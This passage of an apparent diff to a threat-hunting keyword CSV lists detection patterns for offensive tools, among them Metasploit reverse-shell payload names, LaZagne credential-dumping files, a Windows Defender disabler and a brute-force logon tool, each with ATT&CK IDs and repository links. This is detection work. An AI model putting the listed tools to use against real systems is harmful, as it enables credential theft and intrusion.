It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" "*win_keylogger.py*","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","1","N/A","10","10","31","17","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z" "*win_rev_http.exe*","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","1","N/A","10","1","7","2","2023-09-07T08:36:28Z","2021-12-10T15:04:35Z" "*win_rev_https.exe*","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","1","N/A","10","1","7","2","2023-09-07T08:36:28Z","2021-12-10T15:04:35Z" "*win_rev_tcp.exe*","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","1","N/A","10","1","7","2","2023-09-07T08:36:28Z","2021-12-10T15:04:35Z" 
"*win_wlan_passwd_and_wanip_extractor.py*","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","1","N/A","10","10","31","17","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z" -"*Win32.LaZagne*","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","10","10","8527","1980","2023-08-12T12:38:22Z","2015-02-16T14:10:02Z" -"*win32_stage_boot_reverse_shell_revert.asm*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*win32_stage_uploadexec.asm*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*win32_stage_winexec.asm*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. 
and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*Win32kLeaker.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*Win64.Lazagne*","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). 
This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","10","10","8527","1980","2023-08-12T12:38:22Z","2015-02-16T14:10:02Z" -"*Win7Elevate.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*Win7ElevateDll.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*WinBruteLogon* -v -u*","offensive_tool_keyword","win-brute-logon","Bruteforce cracking tool for windows users","T1110 - T1110.001 - T1110.002","TA0008 - TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/DarkCoderSc/win-brute-logon","1","0","N/A","N/A","10","1026","184","2022-12-27T12:06:40Z","2020-05-14T21:46:50Z" -"*WinBruteLogon.dpr*","offensive_tool_keyword","win-brute-logon","Bruteforce cracking tool for windows users","T1110 - T1110.001 - T1110.002","TA0008 - TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/DarkCoderSc/win-brute-logon","1","1","N/A","N/A","10","1026","184","2022-12-27T12:06:40Z","2020-05-14T21:46:50Z" -"*WinBruteLogon.dproj*","offensive_tool_keyword","win-brute-logon","Bruteforce cracking tool for windows users","T1110 - T1110.001 - T1110.002","TA0008 - TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/DarkCoderSc/win-brute-logon","1","1","N/A","N/A","10","1026","184","2022-12-27T12:06:40Z","2020-05-14T21:46:50Z" -"*WinBruteLogon.exe*","offensive_tool_keyword","win-brute-logon","Bruteforce cracking tool for windows users","T1110 - T1110.001 - T1110.002","TA0008 - TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/DarkCoderSc/win-brute-logon","1","1","N/A","N/A","10","1026","184","2022-12-27T12:06:40Z","2020-05-14T21:46:50Z" -"*WinBruteLogon.res*","offensive_tool_keyword","win-brute-logon","Bruteforce cracking tool for windows users","T1110 - T1110.001 - T1110.002","TA0008 - TA0006 - 
TA0005","N/A","N/A","Credential Access","https://github.com/DarkCoderSc/win-brute-logon","1","1","N/A","N/A","10","1026","184","2022-12-27T12:06:40Z","2020-05-14T21:46:50Z" -"*WinCreds.exe*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Win32.LaZagne*","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","10","10","8530","1980","2023-08-12T12:38:22Z","2015-02-16T14:10:02Z" +"*win32_stage_boot_reverse_shell_revert.asm*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*win32_stage_uploadexec.asm*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*win32_stage_winexec.asm*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. 
and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*Win32kLeaker.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*Win64.Lazagne*","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). 
This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","10","10","8530","1980","2023-08-12T12:38:22Z","2015-02-16T14:10:02Z" +"*Win7Elevate.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*Win7ElevateDll.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*WinBruteLogon* -v -u*","offensive_tool_keyword","win-brute-logon","Bruteforce cracking tool for windows users","T1110 - T1110.001 - T1110.002","TA0008 - TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/DarkCoderSc/win-brute-logon","1","0","N/A","N/A","10","1027","184","2022-12-27T12:06:40Z","2020-05-14T21:46:50Z" +"*WinBruteLogon.dpr*","offensive_tool_keyword","win-brute-logon","Bruteforce cracking tool for windows users","T1110 - T1110.001 - T1110.002","TA0008 - TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/DarkCoderSc/win-brute-logon","1","1","N/A","N/A","10","1027","184","2022-12-27T12:06:40Z","2020-05-14T21:46:50Z" +"*WinBruteLogon.dproj*","offensive_tool_keyword","win-brute-logon","Bruteforce cracking tool for windows users","T1110 - T1110.001 - T1110.002","TA0008 - TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/DarkCoderSc/win-brute-logon","1","1","N/A","N/A","10","1027","184","2022-12-27T12:06:40Z","2020-05-14T21:46:50Z" +"*WinBruteLogon.exe*","offensive_tool_keyword","win-brute-logon","Bruteforce cracking tool for windows users","T1110 - T1110.001 - T1110.002","TA0008 - TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/DarkCoderSc/win-brute-logon","1","1","N/A","N/A","10","1027","184","2022-12-27T12:06:40Z","2020-05-14T21:46:50Z" +"*WinBruteLogon.res*","offensive_tool_keyword","win-brute-logon","Bruteforce cracking tool for windows users","T1110 - T1110.001 - T1110.002","TA0008 - TA0006 - 
TA0005","N/A","N/A","Credential Access","https://github.com/DarkCoderSc/win-brute-logon","1","1","N/A","N/A","10","1027","184","2022-12-27T12:06:40Z","2020-05-14T21:46:50Z" +"*WinCreds.exe*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" "*windapsearch --dc *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*windapsearch.py*","offensive_tool_keyword","windapsearch","Python script to enumerate users - groups and computers from a Windows domain through LDAP queries","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/ropnop/windapsearch","1","1","N/A","N/A","7","666","134","2022-04-20T07:40:42Z","2016-08-10T21:43:30Z" -"*windapsearch_enum*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*windapsearch_enum*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - 
TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" "*windapsearch_py2.py*","offensive_tool_keyword","windapsearch","Python script to enumerate users - groups and computers from a Windows domain through LDAP queries","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/ropnop/windapsearch","1","1","N/A","N/A","7","666","134","2022-04-20T07:40:42Z","2016-08-10T21:43:30Z" "*windapsearch-master*","offensive_tool_keyword","windapsearch","Python script to enumerate users - groups and computers from a Windows domain through LDAP queries","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/ropnop/windapsearch","1","1","N/A","N/A","7","666","134","2022-04-20T07:40:42Z","2016-08-10T21:43:30Z" "*WinDefenderKiller*","offensive_tool_keyword","WinDefenderKiller","Windows Defender Killer | C++ Code Disabling Permanently Windows Defender using Registry Keys","T1562.001 - T1055.002 - T1070.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/S12cybersecurity/WinDefenderKiller","1","1","N/A","10","4","327","47","2023-07-27T11:06:24Z","2023-07-25T10:32:25Z" "*winDefKiller.exe*","offensive_tool_keyword","WinDefenderKiller","Windows Defender Killer | C++ Code Disabling Permanently Windows Defender using Registry Keys","T1562.001 - T1055.002 - T1070.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/S12cybersecurity/WinDefenderKiller","1","1","N/A","10","4","327","47","2023-07-27T11:06:24Z","2023-07-25T10:32:25Z" -"*WindfarmDynamite.cdproj*","offensive_tool_keyword","WindfarmDynamite","WindfarmDynamite is a proof-of-concept for code injection using the Windows Notification Facility (WNF). 
Of interest here is that this avoids suspect thread orchestration APIs (like CreateRemoteThread)","T1055.013 - T1546.008","TA0005 - TA0004","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/WindfarmDynamite","1","1","N/A","N/A","10","1069","209","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z" -"*WindfarmDynamite.exe*","offensive_tool_keyword","WindfarmDynamite","WindfarmDynamite is a proof-of-concept for code injection using the Windows Notification Facility (WNF). Of interest here is that this avoids suspect thread orchestration APIs (like CreateRemoteThread)","T1055.013 - T1546.008","TA0005 - TA0004","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/WindfarmDynamite","1","1","N/A","N/A","10","1069","209","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z" -"*WindfarmDynamite.sln*","offensive_tool_keyword","WindfarmDynamite","WindfarmDynamite is a proof-of-concept for code injection using the Windows Notification Facility (WNF). Of interest here is that this avoids suspect thread orchestration APIs (like CreateRemoteThread)","T1055.013 - T1546.008","TA0005 - TA0004","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/WindfarmDynamite","1","1","N/A","N/A","10","1069","209","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z" +"*WindfarmDynamite.cdproj*","offensive_tool_keyword","WindfarmDynamite","WindfarmDynamite is a proof-of-concept for code injection using the Windows Notification Facility (WNF). 
Of interest here is that this avoids suspect thread orchestration APIs (like CreateRemoteThread)","T1055.013 - T1546.008","TA0005 - TA0004","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/WindfarmDynamite","1","1","N/A","N/A","10","1070","209","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z" +"*WindfarmDynamite.exe*","offensive_tool_keyword","WindfarmDynamite","WindfarmDynamite is a proof-of-concept for code injection using the Windows Notification Facility (WNF). Of interest here is that this avoids suspect thread orchestration APIs (like CreateRemoteThread)","T1055.013 - T1546.008","TA0005 - TA0004","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/WindfarmDynamite","1","1","N/A","N/A","10","1070","209","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z" +"*WindfarmDynamite.sln*","offensive_tool_keyword","WindfarmDynamite","WindfarmDynamite is a proof-of-concept for code injection using the Windows Notification Facility (WNF). 
Of interest here is that this avoids suspect thread orchestration APIs (like CreateRemoteThread)","T1055.013 - T1546.008","TA0005 - TA0004","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/WindfarmDynamite","1","1","N/A","N/A","10","1070","209","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z" "*Windows Exploit*","offensive_tool_keyword","_","windows exploit keyword often used in poc exploit github repo or could be a file name or folder","T1068 - T1070 - T1071 - T1078 - T1085 - T1090 - T1105 - T1112 - T1134 - T1135 - T1136 - T1203 - T1210 - T1211 - T1218 - T1222 - T1247 - T1499 - T1505 - T1526 - T1547 - T1548 - T1550 - T1553 - T1574 - T1583 - T1584 - T1587 - T1588 - T1590 - T1591 - T1592 - T1596 - T1600","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011","N/A","N/A","Exploitation tools","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*windows*lsa_secrets.py*","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","10","10","8527","1980","2023-08-12T12:38:22Z","2015-02-16T14:10:02Z" -"*windows/c_payload_util*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. 
and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*Windows/lazagne.spec*","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","10","10","8527","1980","2023-08-12T12:38:22Z","2015-02-16T14:10:02Z" -"*windows/shell_reverse_tcp*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*windows/x64/meterpreter_reverse_tcp*","offensive_tool_keyword","charlotte","c++ fully undetected shellcode launcher","T1055.012 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/9emin1/charlotte","1","1","N/A","10","10","930","234","2021-06-11T04:44:18Z","2021-05-13T07:32:03Z" +"*windows*lsa_secrets.py*","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","10","10","8530","1980","2023-08-12T12:38:22Z","2015-02-16T14:10:02Z" +"*windows/c_payload_util*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
